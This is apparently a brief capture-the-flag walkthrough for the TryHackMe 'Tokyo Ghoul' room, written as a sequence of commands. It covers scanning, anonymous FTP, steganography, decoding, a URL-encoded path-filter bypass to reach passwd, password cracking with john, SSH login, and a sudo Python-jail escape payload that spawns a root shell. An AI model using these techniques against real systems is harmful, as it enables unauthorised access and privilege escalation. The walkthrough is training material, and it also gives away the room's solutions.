Tokyo Ghoul

Room Link: https://tryhackme.com/room/tokyoghoul666

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/21 - FTP

Kali

ftp $VICTIM
Username: ftp
cd need_Help?
mget Aogiri_tree.txt
cd Talk_with_me
mget *

Ghidra

Kali

ghidra

Kali

./need_to_talk 
> kamishiro

Kali

steghide extract -sf rize_and_kaneki.jpg 
Password: You_found_1t

cat yougotme.txt

CyberChef was able to idenfify it was morse code and from there it was obvious the next few steps.

Morse code -> Hex -> Base64

TCP/80 - HTTP

Kali

gobuster dir -u $VICTIM/d1r3c70ry_center/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

There was a filter so to bypass I url encoded the most of path to passwd

Kali

john --wordlist=/usr/share/wordlists/rockyou.txt passwd 

TCP/22 - SSH

Kali

ssh kamishiro@$VICTIM
Password: password123

Victim

sudo -l

Victim

cat  /home/kamishiro/jail.py
sudo /usr/bin/python3 /home/kamishiro/jail.py
>>>  __builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash')